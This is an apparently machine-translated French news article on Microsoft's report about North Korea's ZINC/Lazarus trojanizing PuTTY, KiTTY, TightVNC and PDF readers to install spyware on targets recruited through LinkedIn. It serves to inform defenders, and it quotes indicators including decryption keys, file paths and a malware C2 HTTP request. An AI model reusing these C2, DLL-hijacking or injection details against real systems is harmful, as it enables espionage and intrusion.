Getty Images
Des pirates informatiques soutenus par le gouvernement nord-coréen militarisent des logiciels open source connus dans le cadre d’une campagne en cours qui a déjà réussi à compromettre “de nombreuses” organisations de médias, de défense, d’aérospatiale et de services informatiques, a déclaré Microsoft jeudi.
ZINC, le nom donné par Microsoft à un groupe d’acteurs menaçants également appelé Lazarus, mieux connu pour avoir commis le compromis dévastateur de Sony Pictures Entertainment en 2014, a associé PuTTY et d’autres applications open source légitimes à un code hautement crypté qui finit par installer des logiciels espions malveillants.
Les pirates se font ensuite passer pour des recruteurs d’emplois et se connectent avec des individus d’organisations ciblées via LinkedIn. Après avoir développé un niveau de confiance au cours d’une série de conversations et les avoir éventuellement déplacées vers la messagerie WhatsApp, les pirates demandent aux individus d’installer les applications, qui infectent les environnements de travail des employés.
Microsoft
“Les acteurs ont réussi à compromettre un certain nombre d’organisations depuis juin 2022”, ont écrit des membres de Microsoft Security Threat Intelligence et de LinkedIn Threat Prevention and Defense dans un article. “En raison de la large utilisation des plates-formes et des logiciels utilisés par ZINC dans cette campagne, ZINC peut constituer une menace importante pour les individus et les organisations dans plusieurs secteurs et régions.”
PuTTY est un émulateur de terminal, une console série et une application de transfert de fichiers réseau populaires qui prend en charge les protocoles réseau, notamment SSH, SCP, Telnet, rlogin et la connexion par socket brut. Il y a deux semaines, la société de sécurité Mandiant a averti que des pirates ayant des liens avec la Corée du Nord l’avaient introduit dans une campagne qui avait réussi à compromettre le réseau d’un client. Le message de jeudi indique que les mêmes pirates ont également armé KiTTY, TightVNC, Sumatra PDF Reader et le logiciel muPDF/Subliminal Recording avec un code qui installe le même logiciel espion malveillant, que Microsoft a surnommé ZetaNile.
Lazarus était autrefois un groupe de hackers avec seulement des ressources et des compétences marginales. Au cours de la dernière décennie, ses prouesses ont considérablement augmenté. Les attaques contre les échanges de crypto-monnaie au cours des cinq dernières années ont généré des milliards de dollars pour les programmes d’ADM du pays. Ils trouvent et exploitent régulièrement des vulnérabilités zero-day dans des applications fortement renforcées et utilisent bon nombre des mêmes techniques de logiciels malveillants que celles utilisées par d’autres groupes parrainés par l’État.
Le groupe s’appuie principalement sur le harponnage comme vecteur initial des victimes, mais il utilise également parfois d’autres formes d’ingénierie sociale et de compromis de sites Web. Un thème commun est que les membres ciblent les employés des organisations qu’ils souhaitent compromettre, souvent en les trompant ou en les forçant à installer des logiciels cheval de Troie.
Les applications PuTTY et KiTTY trojanisées que Microsoft a observées utilisent un mécanisme intelligent pour s’assurer que seules les cibles visées sont infectées et qu’elles n’infectent pas d’autres par inadvertance. Les programmes d’installation de l’application n’exécutent aucun code malveillant. Au lieu de cela, le logiciel malveillant ZetaNile est installé uniquement lorsque les applications se connectent à une adresse IP spécifique et utilisent les informations d’identification que les faux recruteurs fournissent aux cibles.
L’exécutable PuTTY trojanisé utilise une technique appelée détournement de commande de recherche DLL, qui charge et décrypte une charge utile de deuxième étape lorsqu’elle est présentée avec la clé “0CE1241A44557AA438F27BC6D4ACA246” pour une utilisation en tant que commande et contrôle. Une fois connectés au serveur C2, les attaquants peuvent installer des logiciels malveillants supplémentaires sur l’appareil compromis. L’application KiTTY fonctionne de la même manière.
Comme KiTTY et PuTTY, le visualiseur TightVNC malveillant installe sa charge utile finale uniquement lorsqu’un utilisateur sélectionne ec2-aet-tech.w-ada[.]amazonaws dans le menu déroulant des hôtes distants pré-rempli dans le visualiseur TightVNC.
Microsoft
Suite de l’article de jeudi :
La version cheval de Troie de Sumatra PDF Reader appelée SecurePDF.exe est utilisée par ZINC depuis au moins 2019 et reste un métier ZINC unique. SecurePDF.exe est un chargeur modulaire qui peut installer l’implant ZetaNile en chargeant un fichier de thème d’application d’emploi basé sur une arme avec une extension .PDF. Le faux PDF contient un en-tête “SPV005”, une clé de décryptage, une charge utile d’implant de deuxième étape cryptée et un PDF leurre crypté, qui s’affiche dans Sumatra PDF Reader lorsque le fichier est ouvert.
Une fois chargé en mémoire, le logiciel malveillant de deuxième étape est configuré pour envoyer le nom d’hôte du système de la victime et les informations sur l’appareil à l’aide d’algorithmes de codage personnalisés à un serveur de communication C2 dans le cadre du processus d’enregistrement C2. Les attaquants peuvent installer des logiciels malveillants supplémentaires sur les appareils compromis en utilisant la communication C2 si nécessaire.
Microsoft
Le message continuait :
Dans la version trojanisée du programme d’installation de muPDF/Subliminal Recording, setup.exe est configuré pour revérifier le chemin du fichier ISSetupPrerequisites\Setup64.exe existe et écrit C:\colrctl\colorui.dll sur le disque après avoir extrait l’exécutable intégré à l’intérieur setup.exe. Il copie ensuite C:\Windows\System32\ColorCpl.exe à C:\ColorCtrl\ColorCpl.exe. Pour les logiciels malveillants de deuxième étape, le programme d’installation malveillant crée un nouveau processus C:\colorctrl\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6Det l’argumentation C3A9B30B6A313F289297C9A36730DB6D est transféré à colorui.dll comme clé de déchiffrement. DLL colorui.dll, que Microsoft suit comme la famille de logiciels malveillants EventHorizon, est injecté dans C:\Windows\System\credwiz.exe ou iexpress.exe pour envoyer des requêtes HTTP C2 dans le cadre du processus d’enregistrement de la victime et pour obtenir une charge utile supplémentaire.
POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]combb =[encrypted payload]= &articles=[encrypted payload]
Le message fournit des indicateurs techniques que les organisations peuvent rechercher pour déterminer si des terminaux de leurs réseaux sont infectés. Il inclut également les adresses IP utilisées dans la campagne que les administrateurs peuvent ajouter à leurs listes de blocage de réseau.
